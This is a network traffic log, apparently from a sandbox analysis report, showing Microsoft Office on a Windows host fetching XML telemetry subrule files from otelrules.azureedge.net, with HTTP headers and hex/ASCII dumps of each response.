                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              34192.168.2.46374913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                              x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061601Z-16ccfc49897bnsqjhC1DFWhxb800000001pg00000000dw5b
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              35192.168.2.46375113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 423
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                              x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061601Z-16dc884887b6mtxqhC1DFW3mk000000001qg0000000055w3
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              36192.168.2.46375213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 478
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                              x-ms-request-id: 1a876f58-701e-0032-1608-2ca540000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061602Z-16ccfc498972c2r2hC1DFWxq6800000001h000000000q1u2
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              37192.168.2.46375413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                              x-ms-request-id: fcd51785-b01e-0098-6c32-2ccead000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061602Z-r159446fcd77lkv8hC1DFWycvw000000012000000000ap0b
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              38192.168.2.46375613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                              x-ms-request-id: 8494348c-501e-000a-1008-2c0180000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061602Z-16ccfc498979lfwnhC1DFW56w800000001rg00000000envf
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              39192.168.2.46375513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 400
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                              x-ms-request-id: f60b378e-801e-0078-1b44-2cbac6000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061602Z-16ccfc498976vdjnhC1DFW5ann00000001ug000000000tcx
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              40192.168.2.46375313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                              x-ms-request-id: 38f7ec36-301e-006e-4608-2cf018000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061602Z-16ccfc49897b872mhC1DFWqtb000000001rg000000002ft7
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              41192.168.2.46375713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:02 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 425
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                              x-ms-request-id: dbe51632-e01e-000c-1608-2c8e36000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061602Z-16dc884887bbsmm2hC1DFWg5rw00000001ng00000000d2p4
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              42192.168.2.46376013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 491
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                              x-ms-request-id: 23dfde6d-e01e-0052-6a0f-2cd9df000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061603Z-r159446fcd79csp5hC1DFW5w2s000000019000000000752y
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
